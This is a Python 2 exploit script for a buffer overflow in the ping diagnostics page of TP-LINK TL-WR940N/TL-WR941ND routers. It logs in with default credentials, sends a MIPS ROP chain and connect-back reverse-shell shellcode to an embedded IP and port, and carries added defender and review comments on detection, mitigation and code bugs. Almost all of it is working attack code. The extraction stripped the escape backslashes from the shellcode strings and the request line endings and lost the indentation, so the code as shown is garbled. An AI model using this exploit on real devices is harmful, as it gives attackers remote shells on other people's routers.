
TP-LINK TL-WR940N / TL-WR941ND Buffer Overflow



#Author Grzegorz Wypych - h0rac
# TP-LINK TL-WR940N/TL-WR941ND buffer overflow remote shell exploit

import requests
import md5
import base64
import string
import struct
import socket

# Build the router's HTTP Basic credential from the factory-default
# username/password pair ('admin'/'admin'): the value is 'admin:<md5(password)>',
# base64-encoded, and is sent as an 'Authorization' cookie below.
# Defender note: everything that follows depends on the default credentials
# still being in place; changing them removes this precondition.
password = md5.new('admin').hexdigest()
cookie = base64.b64encode('admin:'+password)

print '[+] Authorization cookie: ', cookie
print '[+] Login to generate user directory...'
#proxy = {'http':'127.0.0.1:8080'}   # optional intercepting-proxy setting; unused here

# Target is hard-coded to the router's default LAN address. The login
# response is scraped later in the script for the per-session directory
# name the device embeds in its admin URLs.
loginUrl = 'http://192.168.0.1/userRpm/LoginRpm.htm?Save=Save'
# '=' in the base64 value is percent-encoded so it survives inside the cookie header.
headers = {'cookie':'Authorization=Basic%20'+cookie.replace('=', '%3D')}
req = requests.get(loginUrl, headers=headers)
directory = ''

# Filler instruction repeated ahead of the shellcode (used as 'nop * 32' in
# the payload below) so that an imprecise jump into the stack still lands on
# executable filler before the real code.
nop = "x27xE0xFFxFF"

# MIPS (big-endian) machine code, four bytes per instruction; the per-line
# comments are the original author's disassembly. Read top to bottom it
# appears to: open a socket, connect to the host/port embedded below,
# redirect the standard descriptors, then execute '//bin/sh'.
# Defender note: the observable side effect on the device is an outbound
# TCP connection from the router to the embedded address/port followed by a
# shell; that egress is the thing to alert on.
shellcode = string.join([
"x24x0fxffxfa", # li t7,-6
"x01xe0x78x27", # nor t7,t7,zero
"x21xe4xffxfd", # addi a0,t7,-3
"x21xe5xffxfd", # addi a1,t7,-3
"x28x06xffxff", # slti a2,zero,-1
"x24x02x10x57", # li v0,4183
"x01x01x01x0c", # syscall 0x40404
"xafxa2xffxff", # sw v0,-1(sp)
"x8fxa4xffxff", # lw a0,-1(sp)
"x34x0fxffxfd", # li t7,0xfffd
"x01xe0x78x27", # nor t7,t7,zero
"xafxafxffxe0", # sw t7,-32(sp)
# Remote port: 0x1f90 == 8080 (per the lui/ori comments on the next two lines).
"x3cx0ex1fx90", # lui t6,0x1f90
"x35xcex1fx90", # ori t6,t6,0x1f90
"xafxaexffxe4", # sw t6,-28(sp)

# Big endian IP address 172.28.128.4
# NOTE(review): the byte values on the next two literals (c0 a8 / 01 64) read as
# 192.168.1.100, not 172.28.128.4, and the trailing 'lui/ori' comments show yet
# another value; the comments are stale relative to the bytes. Whichever address
# is actually encoded is the connect-back host and belongs in an IoC list.
# Note also that the first literal has no trailing comma, so it is joined with
# the next literal by implicit string concatenation (intended: one 8-byte pair).
"x3cx0exc0xA8" # lui t6,0x7f01
#"xacx1cx80x04", # lui t6,0x7f01
"x35xcex01x64", # ori t6,t6,0x101





"xafxaexffxe6", # sw t6,-26(sp)
"x27xa5xffxe2", # addiu a1,sp,-30
"x24x0cxffxef", # li t4,-17
"x01x80x30x27", # nor a2,t4,zero
"x24x02x10x4a", # li v0,4170
"x01x01x01x0c", # syscall 0x40404
"x24x0fxffxfd", # li t7,-3
"x01xe0x78x27", # nor t7,t7,zero
"x8fxa4xffxff", # lw a0,-1(sp)
"x01xe0x28x21", # move a1,t7
"x24x02x0fxdf", # li v0,4063
"x01x01x01x0c", # syscall 0x40404
"x24x10xffxff", # li s0,-1
"x21xefxffxff", # addi t7,t7,-1
"x15xf0xffxfa", # bne t7,s0,68
"x28x06xffxff", # slti a2,zero,-1
# The four words 0x2f2f 0x6269 0x6e2f 0x7368 spell '//bin/sh' as ASCII.
"x3cx0fx2fx2f", # lui t7,0x2f2f
"x35xefx62x69", # ori t7,t7,0x6269
"xafxafxffxec", # sw t7,-20(sp)
"x3cx0ex6ex2f", # lui t6,0x6e2f
"x35xcex73x68", # ori t6,t6,0x7368
"xafxaexffxf0", # sw t6,-16(sp)
"xafxa0xffxf4", # sw zero,-12(sp)
"x27xa4xffxec", # addiu a0,sp,-20
"xafxa4xffxf8", # sw a0,-8(sp)
"xafxa0xffxfc", # sw zero,-4(sp)
"x27xa5xffxf8", # addiu a1,sp,-8
"x24x02x0fxab", # li v0,4011
"x01x01x01x0c" # syscall 0x40404
], '')

# All code addresses are computed from one fixed libc base. This only works if
# libc is mapped at the same address on every boot of this firmware
# (i.e. no effective ASLR) -- assumed by the author, not verified here.
# Offsets are specific to the libc build shipped with the named models.
libcBase= 0x77f53000
sleep = libcBase + 0x53CA0
gadget1 = libcBase + 0x00055c60 # addiu $a0, $zero, 1; move $t9, $s1; jalr $t9;
gadget2 = libcBase + 0x00024ecc #lw $ra, 0x2c($sp); lw $s1, 0x28($sp); lw $s0, 0x24($sp); jr $ra;
gadget3 = libcBase + 0x0001e20c # move $t9, $s1; lw $ra, 0x24($sp); lw $s2, 0x20($sp); lw $s1, 0x1c($sp); lw $s0, 0x18($sp); jr $t9
gadget4 = libcBase + 0x000195f4 #addiu $s0, $sp, 0x24; move $a0, $s0; move $t9, $s1; jalr $t9;
gadget5 = libcBase + 0x000154d8 # #move $t9, $s0; jalr $t9;

print "[+] First gadget address: ", hex(gadget1)
print "[+] Second gadget address: ", hex(gadget2)
print "[+] Third gadget address: ", hex(gadget3)
print "[+] Fourth gadget address: ", hex(gadget4)
# NOTE(review): prints gadget4 again under the 'Fifth gadget' label; gadget5
# was presumably intended. Cosmetic only -- the chain below uses gadget5 correctly.
print "[+] Fifth gadget address: ", hex(gadget4)
print "[+] Sleep function address: ", hex(sleep)
# Stack layout of the overflowing buffer. Per the gadget comments above, the
# chain is: saved $s1 = gadget2, return address = gadget1 -> gadget1 jumps to
# gadget2 -> gadget2 loads $s1 = sleep and $ra = gadget3 -> gadget3 calls
# sleep(1) and returns to gadget4 with $s1 = gadget5 -> gadget4 points $s0 at
# the stack and jumps to gadget5 -> gadget5 jumps into the nop filler and
# shellcode. The byte offsets in the comments are what each gadget's
# 'lw ..., N($sp)' reads, so they are firmware-specific.
payload = "A"*160   # distance from the start of the buffer to the saved registers
s0 = "BBBB"
s1 = gadget2
payload += s0
payload += struct.pack('>I', s1)   # big-endian, matching the MIPS target
payload += struct.pack('>I', gadget1) #Overwrite RA address
#New stack for gadget 2 starts
payload += "E" * 20 # adjust stack
payload += "FFFF" #gadget3 -> lw $s0, 0x18($sp) => 24 bytes
payload += "GGGG" #gadget3 -> lw $s1, 0x1c($sp) => 28 bytes
payload += "HHHH" #gadget3 -> lw $s2, 0x20($sp) => 32 bytes
payload += "AAAA"
payload += "CCCC"
payload += struct.pack('>I', sleep) #gadget2 -> lw $s1, 0x28($sp) => 40 bytes
payload += struct.pack('>I', gadget3) #gadget2 -> lw $ra, 0x2c($sp) => 44 bytes
#New stack for gadget 3 starts
payload += "G" *24
payload += "A"* 4 #lw $s0, 0x18($sp); sp + 24 bytes = s0
payload += struct.pack('>I', gadget5)#lw $s1, 0x1c($sp); sp + 28 bytes = s1 < = load gadget 5 addr
payload += "C" *4 #lw $s2, 0x20($sp); sp + 32 bytes = s2
payload += struct.pack('>I', gadget4) #lw $ra, 0x24($sp); sp + 36 bytes = ra < = load gadget 4 addr
#New stack for gadget 4 starts
payload += nop * 32
payload += shellcode #addiu $s0, $sp, 0x24; sp + 36 bytes = s0

# NOTE(review): status_code is an int, so any HTTP response at all (401, 404,
# 500 included) makes this condition true; only a missing response would be
# falsy. A success check would compare against 200 instead.
# (The indentation of this if/else body was lost in the page extraction.)
if(req.status_code):
# Scrapes the per-session directory name out of the login page. This is a
# positional split with no validation: if the response layout differs it
# raises IndexError rather than reporting a failed login.
directory = req.text.split('=')[2].split('/')[3]
print '[+] Retrieved folder name: ', directory
req.close()
referer ='http://192.168.0.1/{0}/userRpm/DiagnosticRpm.htm'.format(directory)

host = '192.168.0.1'
port = 80

# The request is written to a raw socket rather than through 'requests',
# presumably so the payload bytes reach the device unencoded -- inferred,
# not stated by the author.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print "[*] Connected, sending payload {0} bytes...".format(len(payload))
# 'host' is passed but the format string only uses {1} (the directory).
pingUrl = '{1}/userRpm/PingIframeRpm.htm'.format(host,directory)
# The overflow sink is the 'ping_addr' parameter of the diagnostics ping page;
# the value is the several-hundred-byte payload built above, far larger than
# any hostname a legitimate client would submit.
# Detection: an authenticated GET to /<dir>/userRpm/PingIframeRpm.htm whose
# ping_addr value is abnormally long, followed by an outbound connection from
# the router. Mitigation: change the default admin credentials, keep the
# admin interface off untrusted networks, and check the vendor for firmware
# updates for these models.
pingUrl += '?ping_addr='+payload+'&doType=ping&isNew=new&sendNum=4&psize=64&overTime=800&trHops=20'
auth = 'Authorization=Basic%20'+cookie.replace('=', '%3D')
pingReq = "GET /{0} HTTP/1.1rnHost: {1}rnReferer: {2}rncookie: {3}rnrn".format(pingUrl, host, referer, auth)
print "[+] Exploit request: {0}".format(pingReq)
s.send(pingReq)
# Response is read once and discarded; nothing is checked.
s.recv(4096)
s.close()
else:
req.close()
